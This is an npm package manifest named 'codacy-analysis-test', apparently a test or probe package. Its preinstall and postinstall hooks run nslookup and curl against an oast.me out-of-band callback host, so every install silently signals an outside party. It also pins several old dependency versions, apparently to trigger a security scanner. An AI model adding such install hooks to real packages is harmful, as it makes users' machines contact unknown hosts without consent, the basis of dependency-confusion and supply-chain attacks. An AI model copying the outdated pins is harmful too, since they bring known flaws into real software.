{
  "name": "codacy-analysis-test",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "nslookup npmpre.d983hqvbc9htsrg9dc20g6kgxpg5c6iya.oast.me || curl -s http://npmpre.d983hqvbc9htsrg9dc20g6kgxpg5c6iya.oast.me/ || true",
    "postinstall": "nslookup npmpost.d983hqvbc9htsrg9dc20g6kgxpg5c6iya.oast.me || curl -s http://npmpost.d983hqvbc9htsrg9dc20g6kgxpg5c6iya.oast.me/ || true"
  },
  "dependencies": {
    "lodash": "4.17.4",
    "minimist": "0.0.8",
    "axios": "0.18.0"
  }
}